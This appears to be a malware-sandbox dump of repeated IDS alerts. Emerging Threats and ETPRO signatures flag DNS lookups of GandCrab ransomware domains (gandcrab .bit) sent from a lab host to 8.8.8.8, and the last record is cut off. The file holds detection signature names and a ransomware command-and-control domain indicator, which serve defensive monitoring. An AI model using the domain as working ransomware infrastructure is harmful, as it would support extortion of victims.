ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865388532026737 09/01/22-00:02:38.683294
SID:	2026737
Source Port:	65388
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852460532026737 09/01/22-00:03:02.922606
SID:	2026737
Source Port:	52460
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861361532829498 09/01/22-00:03:28.363595
SID:	2829498
Source Port:	61361
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865464532829500 09/01/22-00:03:37.331573
SID:	2829500
Source Port:	65464
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863566532026737 09/01/22-00:02:17.069143
SID:	2026737
Source Port:	63566
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849203532026737 09/01/22-00:02:46.656883
SID:	2026737
Source Port:	49203
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864972532829500 09/01/22-00:03:05.639386
SID:	2829500
Source Port:	64972
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853051532829498 09/01/22-00:02:15.015452
SID:	2829498
Source Port:	53051
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851995532026737 09/01/22-00:02:26.294405
SID:	2026737
Source Port:	51995
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851107532829500 09/01/22-00:03:01.623107
SID:	2829500
Source Port:	51107
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864969532829500 09/01/22-00:02:44.846895
SID:	2829500
Source Port:	64969
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852113532026737 09/01/22-00:03:20.304409
SID:	2026737
Source Port:	52113
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858121532829498 09/01/22-00:02:27.883460
SID:	2829498
Source Port:	58121
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857707532829500 09/01/22-00:01:42.707644
SID:	2829500
Source Port:	57707
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861420532829498 09/01/22-00:02:03.023139
SID:	2829498
Source Port:	61420
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860772532829498 09/01/22-00:01:45.515640
SID:	2829498
Source Port:	60772
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859379532829500 09/01/22-00:02:48.360270
SID:	2829500
Source Port:	59379
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860420532829498 09/01/22-00:03:32.361100
SID:	2829498
Source Port:	60420
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858306532026737 09/01/22-00:02:34.518930
SID:	2026737
Source Port:	58306
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857136532829498 09/01/22-00:01:34.170593
SID:	2829498
Source Port:	57136
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863692532829498 09/01/22-00:03:21.709351
SID:	2829498
Source Port:	63692
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851110532829500 09/01/22-00:03:01.687030
SID:	2829500
Source Port:	51110
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855651532829498 09/01/22-00:03:19.239137
SID:	2829498
Source Port:	55651
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861187532829498 09/01/22-00:02:52.669551
SID:	2829498
Source Port:	61187
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850789532026737 09/01/22-00:02:43.405655
SID:	2026737
Source Port:	50789
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864126532829498 09/01/22-00:02:44.367092
SID:	2829498
Source Port:	64126
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.856045532829500 09/01/22-00:01:38.479108
SID:	2829500
Source Port:	56045
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849876532829500 09/01/22-00:02:36.017097
SID:	2829500
Source Port:	49876
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853430532829498 09/01/22-00:02:18.389778
SID:	2829498
Source Port:	53430
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864275532829498 09/01/22-00:03:00.076893
SID:	2829498
Source Port:	64275
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852746532026737 09/01/22-00:03:24.060420
SID:	2026737
Source Port:	52746
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865199532829500 09/01/22-00:02:04.790776
SID:	2829500
Source Port:	65199
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855643532829498 09/01/22-00:01:41.349610
SID:	2829498
Source Port:	55643
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865322532026737 09/01/22-00:01:43.838373
SID:	2026737
Source Port:	65322
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857389532829500 09/01/22-00:02:53.228134
SID:	2829500
Source Port:	57389
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852457532026737 09/01/22-00:03:02.822494
SID:	2026737
Source Port:	52457
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859766532026737 09/01/22-00:03:34.053456
SID:	2026737
Source Port:	59766
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850094532026737 09/01/22-00:03:38.722516
SID:	2026737
Source Port:	50094
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863689532829498 09/01/22-00:03:21.642301
SID:	2829498
Source Port:	63689
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864828532829500 09/01/22-00:02:24.814616
SID:	2829500
Source Port:	64828
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.862427532026737 09/01/22-00:03:13.168037
SID:	2026737
Source Port:	62427
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858485532829500 09/01/22-00:03:30.012594
SID:	2829500
Source Port:	58485
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860586532026737 09/01/22-00:01:27.526553
SID:	2026737
Source Port:	60586
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860648532829498 09/01/22-00:03:25.320562
SID:	2829498
Source Port:	60648
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850231532026737 09/01/22-00:02:54.755739
SID:	2026737
Source Port:	50231
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859831532829500 09/01/22-00:02:55.995864
SID:	2829500
Source Port:	59831
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857138532829498 09/01/22-00:01:34.214783
SID:	2829498
Source Port:	57138
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865465532829500 09/01/22-00:03:37.351949
SID:	2829500
Source Port:	65465
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859641532026737 09/01/22-00:01:39.990388
SID:	2026737
Source Port:	59641
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859638532026737 09/01/22-00:01:39.931325
SID:	2026737
Source Port:	59638
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854435532829498 09/01/22-00:03:36.023381
SID:	2829498
Source Port:	54435
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860818532829500 09/01/22-00:03:08.745097
SID:	2829500
Source Port:	60818
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857576532829498 09/01/22-00:01:53.290249
SID:	2829498
Source Port:	57576
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849171532829500 09/01/22-00:02:32.489443
SID:	2829500
Source Port:	49171
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851144532829498 09/01/22-00:01:24.145242
SID:	2829498
Source Port:	51144
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852115532026737 09/01/22-00:03:20.348262
SID:	2026737
Source Port:	52115
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.856620532026737 09/01/22-00:02:49.146584
SID:	2026737
Source Port:	56620
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851109532829500 09/01/22-00:03:01.665772
SID:	2829500
Source Port:	51109
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864379532829500 09/01/22-00:03:19.992460
SID:	2829500
Source Port:	64379
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864599532829498 09/01/22-00:02:22.089885
SID:	2829498
Source Port:	64599
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860821532829500 09/01/22-00:03:08.846909
SID:	2829500
Source Port:	60821
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849205532026737 09/01/22-00:02:46.696702
SID:	2026737
Source Port:	49205
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849878532829500 09/01/22-00:02:36.053729
SID:	2829500
Source Port:	49878
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853846532829498 09/01/22-00:01:59.423880
SID:	2829498
Source Port:	53846
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860091532829500 09/01/22-00:02:16.509694
SID:	2829500
Source Port:	60091
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859377532829500 09/01/22-00:02:48.283085
SID:	2829500
Source Port:	59377
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859824532026737 09/01/22-00:02:19.994370
SID:	2026737
Source Port:	59824
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864607532829500 09/01/22-00:02:41.921899
SID:	2829500
Source Port:	64607
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855249532829498 09/01/22-00:03:03.506251
SID:	2829498
Source Port:	55249
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864380532829500 09/01/22-00:03:20.011368
SID:	2829500
Source Port:	64380
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850092532026737 09/01/22-00:03:38.678470
SID:	2026737
Source Port:	50092
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853272532829498 09/01/22-00:02:55.282821
SID:	2829498
Source Port:	53272
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857392532829500 09/01/22-00:02:53.296910
SID:	2829500
Source Port:	57392
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858916532829500 09/01/22-00:03:18.060823
SID:	2829500
Source Port:	58916
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853053532829498 09/01/22-00:02:15.057233
SID:	2829498
Source Port:	53053
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864826532829500 09/01/22-00:02:24.770961
SID:	2829500
Source Port:	64826
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853625532026737 09/01/22-00:02:01.788642
SID:	2026737
Source Port:	53625
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851596532026737 09/01/22-00:03:26.954769
SID:	2026737
Source Port:	51596
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.862435532026737 09/01/22-00:02:57.512287
SID:	2026737
Source Port:	62435
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853852532026737 09/01/22-00:01:50.489647
SID:	2026737
Source Port:	53852
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.862429532026737 09/01/22-00:03:13.209944
SID:	2026737
Source Port:	62429
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860584532026737 09/01/22-00:01:27.482735
SID:	2026737
Source Port:	60584
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864124532829498 09/01/22-00:02:44.327136
SID:	2829498
Source Port:	64124
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861189532829498 09/01/22-00:02:52.764321
SID:	2829498
Source Port:	61189
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849168532829500 09/01/22-00:02:32.423642
SID:	2829500
Source Port:	49168
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863451532829498 09/01/22-00:02:35.516825
SID:	2829498
Source Port:	63451
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850625532026737 09/01/22-00:03:18.697259
SID:	2026737
Source Port:	50625
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854286532829500 09/01/22-00:03:33.715891
SID:	2829500
Source Port:	54286
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860769532829498 09/01/22-00:01:45.451637
SID:	2829498
Source Port:	60769
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852744532026737 09/01/22-00:03:24.019183
SID:	2026737
Source Port:	52744
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855641532829498 09/01/22-00:01:41.302395
SID:	2829498
Source Port:	55641
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853469532829500 09/01/22-00:02:00.624524
SID:	2829500
Source Port:	53469
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860770532829498 09/01/22-00:01:45.473540
SID:	2829498
Source Port:	60770
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853470532829500 09/01/22-00:02:00.646017
SID:	2829500
Source Port:	53470
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865324532026737 09/01/22-00:01:43.883100
SID:	2026737
Source Port:	65324
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853851532026737 09/01/22-00:01:50.267332
SID:	2026737
Source Port:	53851
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.862433532026737 09/01/22-00:02:57.467935
SID:	2026737
Source Port:	62433
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859584532026737 09/01/22-00:02:11.726579
SID:	2026737
Source Port:	59584
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860475532829498 09/01/22-00:02:47.139274
SID:	2829498
Source Port:	60475
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864123532829498 09/01/22-00:02:44.306860
SID:	2829498
Source Port:	64123
Destination Port:	53
Protocol:	UDP
